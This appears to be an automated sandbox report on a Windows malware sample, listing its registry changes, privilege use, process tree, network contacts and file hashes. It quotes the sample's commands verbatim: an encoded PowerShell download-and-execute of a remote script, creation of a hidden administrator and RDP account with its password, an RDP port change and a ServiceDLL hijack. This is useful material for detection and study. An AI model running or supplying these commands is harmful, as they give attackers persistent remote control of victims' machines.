Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3128 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2916 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1308 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1308 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2916 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2916 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2788 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2788 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2916 wrote to memory of 196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 196 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 196 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1300 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1300 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3028 wrote to memory of 2532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3028 wrote to memory of 2532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3080 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3080 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3832 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3832 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3916 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3916 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1188 wrote to memory of 2260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1188 wrote to memory of 2260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2300 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2300 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2264 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2264 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2972 wrote to memory of 1420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2972 wrote to memory of 1420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2068 wrote to memory of 1520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1520 wrote to memory of 2172 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3980 wrote to memory of 1300 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1300 wrote to memory of 196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2972 wrote to memory of 3968 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A23.tmp" "c:\Users\Admin\AppData\Local\Temp\wxut4r0f\CSC249ECC34788B4231A934D2558BAC15C4.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc N9Xm3ZCO

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc N9Xm3ZCO

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe

cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes

C:\Windows\system32\net.exe

net user wgautilacc 111213

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc 111213

C:\Windows\system32\net.exe

net user wgautilacc /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc /active:yes

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.edpnet.net udp
N/A 212.71.0.110:8080 speedtest.edpnet.net tcp
N/A 8.8.8.8:53 speedtest.totaalhost.com udp
N/A 77.169.127.181:8080 speedtest.totaalhost.com tcp
N/A 8.8.8.8:53 st.mr-joep.nl udp
N/A 77.170.178.37:8080 st.mr-joep.nl tcp
N/A 8.8.8.8:53 speedtest1.mirror.nucleus.be udp
N/A 31.193.177.85:8080 speedtest1.mirror.nucleus.be tcp
N/A 8.8.8.8:53 hitnaiguat.xyz udp
N/A 8.8.8.8:53 whereihjeu3.xyz udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp

Files

memory/3128-114-0x00000126E93E0000-0x00000126E9800000-memory.dmp

memory/3128-115-0x00000126E87D0000-0x00000126E87D2000-memory.dmp

memory/3128-118-0x00000126E87D5000-0x00000126E87D6000-memory.dmp

memory/3128-117-0x00000126E87D3000-0x00000126E87D5000-memory.dmp

memory/3128-119-0x00000126E87D6000-0x00000126E87D7000-memory.dmp

memory/2916-120-0x0000000000000000-mapping.dmp

memory/2916-125-0x000001E5C7E70000-0x000001E5C7E72000-memory.dmp

memory/2916-126-0x000001E5C7E73000-0x000001E5C7E75000-memory.dmp

memory/2916-127-0x000001E5C7E10000-0x000001E5C7E11000-memory.dmp

memory/2916-130-0x000001E5C8000000-0x000001E5C8001000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/2916-136-0x000001E5C7E76000-0x000001E5C7E78000-memory.dmp

memory/1308-137-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.cmdline

MD5 4c3eddd88e27613137f9fc37e4b264ca
SHA1 0d4557f4dd9afb549c244a21072ad3296113df53
SHA256 37ca03b68da12b308b0d1562baabc3503db1e7cd03727a25ebe24db24b9744ab
SHA512 f4bf682a65d4b2a94d8b1fff380df3fa792597c4b344c5cf0800af6a428583f81fe4cdb6114f9d40b7881a0e6754c2a3e8a6d7cb49a230ec7791ae4c3fc5b182

\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1312-140-0x0000000000000000-mapping.dmp

